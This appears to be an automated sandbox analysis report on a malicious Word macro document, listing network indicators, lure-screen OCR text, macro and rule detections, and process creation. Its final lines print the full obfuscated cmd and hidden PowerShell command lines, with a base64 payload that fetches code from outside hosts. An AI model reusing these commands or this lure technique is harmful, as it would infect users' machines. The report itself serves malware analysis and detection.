Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/about-us/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/analysis/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/analysis/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/category/%E2%80%98Ilm-%E2%80%98Amal-Akhlak/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/category/Central-Message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/category/Islam-Today/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/category/Tarbiyyah-Da%E2%80%99wah-Jihad/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/category/Treasure-Seerah/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/foreword-founder/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/issues/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/our-team/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/privacy-policy/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/solution/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/solution/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/terms-and-conditions/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01-100x100.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/cropped-logo-tbf-1-1.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/wp-json/wp-statistics/v2/hit?_=1610016483&_wpnonce=abbff8401c&wp_statistic
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://thebestfikrah.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://tubepatrol.porn/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/thebestfikrah
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/company/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/company/contact/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/air-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/cost-calculators/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/courier/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/ocean-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/services/trucking/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/track-and-trace/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-color.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://wheelcomoving.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://wp-statistics.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://www.boldgrid.com/w3-total-cache/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://www.exactmetrics.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/thebestfikrah/?hl=en
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://xxxthtube.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: I N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 5389
Source: unknownProcess created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5293Jump to behavior
Source: Informacion_29.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_openName: Document_open
Source: Informacion_29.docOLE indicator, VBA macros: true
Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engineClassification label: mal96.troj.evad.winDOC@6/6@8/7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$formacion_29.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC64B.tmpJump to behavior
Source: Informacion_29.docOLE indicator, Word Document stream: true
Source: Informacion_29.docOLE document summary: title field not present or empty
Source: Informacion_29.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............-........................... .4.......4...............'.....X.'.............#...............................h.......5kU.......'.....Jump to behavior
Source: C:\Windows\System32\msg.exeConsole Write: ............-...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........'.....L.................'.....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................}...............}.......x.....`Iz........v.....................K........^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.....`......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... A...............A.............}..v....`a......0.l...............^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................X..j......................A.............}..v.... n......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................X..j....h.^...............A.............}..v.....n......0.l...............^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............(..j......................A.............}..v....`.......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............(..j..... A...............A.............}..v............0.l.............8.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....(................A.............}..v............0.l.............h.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j.....(................A.............}..v....(.......0.l.............h.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Informacion_29.docVirustotal: Detection: 62%
Source: Informacion_29.docReversingLabs: Detection: 79%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwA